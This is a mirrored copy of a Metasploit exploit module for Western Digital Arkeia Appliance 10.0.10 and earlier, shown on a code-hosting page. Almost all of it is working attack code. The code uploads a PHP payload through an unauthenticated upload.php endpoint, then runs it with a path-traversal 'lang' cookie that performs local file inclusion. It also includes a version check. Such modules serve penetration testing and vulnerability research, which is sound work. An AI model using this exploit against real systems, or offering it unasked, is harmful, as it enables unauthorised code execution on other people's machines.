Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/arkeia_upload_exec.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::FileDropper

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "Western Digital Arkeia Remote Code Execution",

17
        'Description' => %q{

18
          This module exploits a vulnerability found in Western Digital Arkeia Appliance

19
          version 10.0.10 and lower. By abusing the upload.php script,

20
          a malicious user can upload arbitrary code to the ApplianceUpdate file in the temp

21
          directory without authentication. Abusing the local file inclusion in the lang

22
          cookie to parse this file results in arbitrary code execution, also without

23
          authentication. The module has been tested successfully on Arkeia 10.0.10. The issues

24
          have been fixed in version 10.1.10.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => [

28
          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module

29
        ],

30
        'References' => [

31
          [ 'OSVDB', '97614' ],

32
          [ 'OSVDB', '97615' ],

33
          [ 'EDB', '28330' ]

34
        ],

35
        'Platform' => ['php'],

36
        'Arch' => ARCH_PHP,

37
        'Targets' => [

38
          ['Western Digital Arkeia Appliance 10.0.10', {}]

39
        ],

40
        'Privileged' => false,

41
        'DisclosureDate' => '2013-09-16',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptString.new('TARGETURI', [true, 'The base path to the Arkeia Appliance', '/'])

54
      ]

55
    )

56
  end

57


58
  def uri

59
    return target_uri.path

60
  end

61


62
  def check

63
    # Check version

64
    print_status("Trying to detect installed version")

65


66
    res = send_request_cgi({

67
      'method' => 'GET',

68
      'uri' => normalize_uri(uri)

69
    })

70


71
    if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/

72
      version = $1

73
    else

74
      return Exploit::CheckCode::Unknown

75
    end

76


77
    vprint_status("Version #{version} detected")

78


79
    if version > "10.0.10"

80
      return Exploit::CheckCode::Safe

81
    end

82


83
    # Check for vulnerable component

84
    vprint_status("Trying to detect the vulnerable component")

85


86
    res = send_request_cgi({

87
      'method' => 'GET',

88
      'headers' => { 'Cookie' => "lang=fr" },

89
      'uri' => normalize_uri(uri)

90
    })

91


92
    if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/

93
      return Exploit::CheckCode::Appears

94
    end

95


96
    return Exploit::CheckCode::Safe

97
  end

98


99
  def exploit

100
    payload_name = rand_text_alpha(rand(10) + 5)

101


102
    post_data = Rex::MIME::Message.new

103
    post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"UPLOAD\"; filename=\"#{payload_name}\"")

104
    file = post_data.to_s

105
    file.strip!

106


107
    print_status("Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate")

108
    res = send_request_cgi({

109
      'method' => 'POST',

110
      'uri' => normalize_uri(uri, "scripts", "upload.php"),

111
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",

112
      'data' => file

113
    })

114


115
    # If the server returns 200 we assume we uploaded the malicious

116
    # file successfully

117
    if not res or res.code != 200

118
      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")

119
    end

120


121
    register_files_for_cleanup("/tmp/ApplianceUpdate")

122


123
    print_status("Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate")

124
    res = send_request_cgi({

125
      'method' => 'GET',

126
      'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },

127
      'uri' => normalize_uri(uri)

128
    })

129


130
    # If we don't get a 200 when we request our malicious payload, we suspect

131
    # we don't have a shell, either.

132
    if res and res.code != 200

133
      print_error("Unexpected response, probably the exploit failed")

134
    end

135
  end

136
end

137


138